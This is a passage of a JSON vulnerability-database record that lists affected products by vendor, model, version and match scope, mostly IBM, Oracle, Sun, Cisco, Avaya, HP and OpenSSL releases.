            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.6"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x355079140"
          },
          {
            "_id": null,
            "model": "pureapplication system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.1.0.2"
          },
          {
            "_id": null,
            "model": "os image for red hat",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.0"
          },
          {
            "_id": null,
            "model": "domino",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2.4"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ac0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.4.0.5"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1b",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0k",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system platform sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jdk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.0.160"
          },
          {
            "_id": null,
            "model": "jre update28",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.280"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v35006.2"
          },
          {
            "_id": null,
            "model": "rational doors web access",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.51"
          },
          {
            "_id": null,
            "model": "jdk 1.6.0 01-b06",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "blend for android",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "image construction and composition tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.3.2.0"
          },
          {
            "_id": null,
            "model": "aura conferencing",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "aura system platform sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "centos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "centos",
            "version": "6"
          },
          {
            "_id": null,
            "model": "tivoli workload scheduler distributed fp01",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.2.0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50006.2"
          },
          {
            "_id": null,
            "model": "rational requisitepro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.4"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3850x571910"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.2"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.017"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2.1"
          },
          {
            "_id": null,
            "model": "smart analytics system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10500"
          },
          {
            "_id": null,
            "model": "b2b advanced communications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.0.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.32"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.4"
          },
          {
            "_id": null,
            "model": "anyconnect secure mobility client for ios",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "004.000(1233)"
          },
          {
            "_id": null,
            "model": "tivoli storage flashcopy manager for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "real-time compression appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.2.10"
          },
          {
            "_id": null,
            "model": "jdk 1.5.0.0 03",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "security privileged identity manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "sterling connect:direct for hp nonstop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.6"
          },
          {
            "_id": null,
            "model": "clustered data ontap antivirus connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.0.1"
          },
          {
            "_id": null,
            "model": "network node manager ispi for net",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.1"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet10i",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "aura utility services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "rational business developer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.16"
          },
          {
            "_id": null,
            "model": "jre update33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "workload deployer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.12"
          },
          {
            "_id": null,
            "model": "bes12 client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "12.0.0.69"
          },
          {
            "_id": null,
            "model": "cloud manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.1.0.4"
          },
          {
            "_id": null,
            "model": "buildforge",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.3"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.1.0"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9"
          },
          {
            "_id": null,
            "model": "norman shark industrial control system protection",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "bluecoat",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "link for mac os (build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.1.135)"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.0.27"
          },
          {
            "_id": null,
            "model": "system type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x3850x571450"
          },
          {
            "_id": null,
            "model": "network node manager i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "ip office application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "java sdk sr11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "java sdk sr15",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "aura conferencing sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.0.121"
          },
          {
            "_id": null,
            "model": "communications core session manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.2.5"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.1"
          },
          {
            "_id": null,
            "model": "jdk update18",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.5"
          },
          {
            "_id": null,
            "model": "mashup center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0.1"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.8"
          },
          {
            "_id": null,
            "model": "security appscan standard",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.1.0.7"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.5"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.6"
          },
          {
            "_id": null,
            "model": "domino fix pack if",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.367"
          },
          {
            "_id": null,
            "model": "jre update1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.7.0"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.18"
          },
          {
            "_id": null,
            "model": "telepresence profile series",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.3"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.12"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.20"
          },
          {
            "_id": null,
            "model": "rational developer for power systems software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.03"
          },
          {
            "_id": null,
            "model": "aura messaging sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "enterprise manager ops center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.0.1"
          },
          {
            "_id": null,
            "model": "unified communications domain manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "10.1.2"
          },
          {
            "_id": null,
            "model": "iq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.031"
          },
          {
            "_id": null,
            "model": "rational developer for aix and cobol",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "emergency responder",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tivoli provisioning manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "im and presence service",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v50007.3.0.5"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.3.4"
          },
          {
            "_id": null,
            "model": "db2 connect unlimited advanced edition for system z",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.030"
          },
          {
            "_id": null,
            "model": "cloud object store",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "notes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0a",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.9.790"
          },
          {
            "_id": null,
            "model": "cognos controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.1"
          },
          {
            "_id": null,
            "model": "websphere service registry and repository studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.0.17"
          },
          {
            "_id": null,
            "model": "mate collector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "aura collaboration environment",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "video surveillance series ip cameras",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30000"
          },
          {
            "_id": null,
            "model": "upward integration modules for vmware vsphere",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.5"
          },
          {
            "_id": null,
            "model": "telepresence server on virtual machine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "rational sap connector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.0.4"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.019"
          },
          {
            "_id": null,
            "model": "api management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "proactive network operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "jre 1.6.0 37",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "6"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8f",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "bbm on android",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "2.7.0.6"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.0.4.7-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for traffic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "websphere mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.19"
          },
          {
            "_id": null,
            "model": "maximo asset management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.1.7"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8u",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0"
          },
          {
            "_id": null,
            "model": "version control repository manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8.780"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1a",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "network node manager ispi for mpls vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "link for windows",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "1.2.3.48"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.2.2"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v90007.5.1.0"
          },
          {
            "_id": null,
            "model": "communications session border controller scz7.4.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "smartcloud entry fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.1.0.410"
          },
          {
            "_id": null,
            "model": "phaser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "32603.50.01.11"
          },
          {
            "_id": null,
            "model": "bbm protected on blackberry os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blackberry",
            "version": "0"
          },
          {
            "_id": null,
            "model": "db2 connect enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.1"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0p",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "flex system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.2.0.0"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7"
          },
          {
            "_id": null,
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "10.04"
          },
          {
            "_id": null,
            "model": "workload deployer",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.16"
          },
          {
            "_id": null,
            "model": "security access manager for mobile",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.3"
          },
          {
            "_id": null,
            "model": "phaser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "36000"
          },
          {
            "_id": null,
            "model": "telepresence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "70104.1"
          },
          {
            "_id": null,
            "model": "cms r16.3 r6",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "rational automation framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.1.1"
          },
          {
            "_id": null,
            "model": "sametime",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8zb",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "netscaler t1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "citrix",
            "version": "0"
          },
          {
            "_id": null,
            "model": "flex system manager node types",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "79550"
          },
          {
            "_id": null,
            "model": "app for netapp data ontap",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "7.2.2"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "notes fix pack",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.13"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.0.2-77"
          },
          {
            "_id": null,
            "model": "infosphere master data management server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "11.3"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.4"
          },
          {
            "_id": null,
            "model": "system m4 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x350073830"
          },
          {
            "_id": null,
            "model": "aura system manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.2.3"
          },
          {
            "_id": null,
            "model": "image construction and composition tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "2.3.1.0"
          },
          {
            "_id": null,
            "model": "prime collaboration assurance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "version control agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "6.0.0.840"
          },
          {
            "_id": null,
            "model": "telepresence content server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.035"
          },
          {
            "_id": null,
            "model": "network node manager ispi performance for traffic",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.25"
          },
          {
            "_id": null,
            "model": "aura system platform sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "project openssl 0.9.8w",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser user interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.51"
          },
          {
            "_id": null,
            "model": "network node manager ispi for mpls vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.039"
          },
          {
            "_id": null,
            "model": "websphere process server hypervisor edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "as infinity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "pexip",
            "version": "1"
          },
          {
            "_id": null,
            "model": "license metric tool",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70007.4"
          },
          {
            "_id": null,
            "model": "rational collaborative lifecycle management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0.0"
          },
          {
            "_id": null,
            "model": "data ontap operating in 7-mode",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.3"
          },
          {
            "_id": null,
            "model": "rational engineering lifecycle manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.0m",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "sterling connect:direct browser",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "java sdk sr8-fp10",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.13"
          },
          {
            "_id": null,
            "model": "cognos planning interim fix",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "10.12"
          },
          {
            "_id": null,
            "model": "jre update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.6.026"
          },
          {
            "_id": null,
            "model": "project openssl 1.0.1g",
            "scope": null,
            "trust": 0.3,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": "smartcloud entry",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.2.0.4"
          },
          {
            "_id": null,
            "model": "datapower gateway",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0.4"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.15.1"
          },
          {
            "_id": null,
            "model": "splunk",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "splunk",
            "version": "5.0.12"
          },
          {
            "_id": null,
            "model": "flashsystem 9848-ae1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v840"
          },
          {
            "_id": null,
            "model": "jre update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.5.0.60"
          },
          {
            "_id": null,
            "model": "tivoli access manager for e-business",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "java sdk sr4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7"
          },
          {
            "_id": null,
            "model": "media services interface",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "netezza platform software 7.0.2.15-p1",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "rational functional tester",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.6.0.1"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5.055"
          },
          {
            "_id": null,
            "model": "chassis management module 2pet12k",
            "scope": null,
            "trust": 0.3,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.13"
          },
          {
            "_id": null,
            "model": "storwize",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v37007.2.0.8"
          },
          {
            "_id": null,
            "model": "jdk update",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "1.6.014"
          },
          {
            "_id": null,
            "model": "thinpro linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "(x86)4.3"
          },
          {
            "_id": null,
            "model": "notes",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1.3"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5.0"
          },
          {
            "_id": null,
            "model": "system m3 type",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "x365079450"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.5"
          },
          {
            "_id": null,
